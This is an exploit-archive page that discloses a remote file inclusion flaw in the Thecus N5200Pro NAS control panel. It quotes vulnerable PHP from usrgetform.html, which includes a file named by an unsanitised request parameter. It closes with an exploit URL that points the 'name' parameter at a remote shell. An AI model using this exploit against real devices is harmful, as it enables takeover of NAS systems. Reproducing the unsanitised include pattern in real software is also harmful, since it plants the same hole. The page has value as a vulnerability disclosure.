Thecus N5200Pro NAS Server Control Panel RFI Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Thecus N5200Pro NAS Server Control Panel RFI Vulnerability
# Published : 2008-02-18
# Author : Crackers_Child
# Previous Title : Ourgame GLWorld 2.x hgs_startNotify() ActiveX Buffer Overflow Exploit
# Next Title : Philips VOIP841 (Firmware <= 1.0.4.800) Multiple Vulnerabilities

Thecus N5200Pro NAS Server Control Panel Remote File ?°nclude


Author : Crackers_Child

Mail   : cashr00t@hotmail.com

Bug in : usrgetform.html


<?php
    $htm=$_REQUEST['name'];
    require_once("/img/htdocs/webconfig");
    require_once("/img/www/inc/function.php");
    get_sysconf();
    $version=trim(shell_exec("/bin/cat /img/version"));
    $model=trim(shell_exec('/bin/cat /proc/thecus_io | awk -F: '/CPUFLAG/{printf("%s", $2)}''));
    if($model=="1"){
      $model_name=$webconfig['product_no'].$webconfig['pro'];
    }else{
      $model_name=$webconfig['product_no'];
    }
    if (!$htm){
        print 'no name given';
        exit;
    }
    if ($htm=='lang') $htm='../pub/lang';
    session_start();
    header('Content-type: text/html;charset=utf-8');
    $lang='en';
    if (isset($_SESSION['lang'])){$lang=$_SESSION['lang'];};
    ob_start();
    include("$htm.htm");
    $html=ob_get_contents();
    ob_end_clean();

    include_once('header.html');
?>



Exploit : www.site.com:9443/usr/usrgetform.html?name=Shelz?

?°nfo : http://www.thecus.com/products_over.php?cid=11&pid=8

Greetz: Str0ke

# www.Syue.com [2008-02-18]